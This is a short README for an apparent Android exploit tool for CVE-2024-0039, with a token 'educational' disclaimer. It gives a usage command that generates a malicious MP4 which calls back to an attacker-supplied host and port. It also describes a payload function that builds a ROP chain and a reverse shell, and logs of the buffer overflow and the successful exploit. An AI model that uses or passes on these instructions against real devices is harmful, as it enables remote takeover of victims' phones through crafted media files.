
Эксплойт для уязвимости CVE-2024-0039 на Android, который позволяет выполнять произвольный код через MP4 файл. Этот репозиторий создан для образовательных целей.
Python script for exploiting CVE-2024-0039: arbitrary code execution on vulnerable Android devices.
WARNING: This code is intended for educational and constructive purposes only, on the side of good, so to speak!
Run the script with the necessary arguments:
python exploit.py --cb-host <Your IP> --cb-port <Your port> --output exploit.mp4
create_malicious_payloadCreates a malicious payload with a ROP chain and reverse shell.
write_to_fileLogs are saved in logs/exploit.log. Logs script actions such as ROP chain creation, buffer overflow, file writing, and successful exploit execution.
This project is licensed under the MIT License - see the LICENSE file for details. Because even hacking should be legal... well, almost.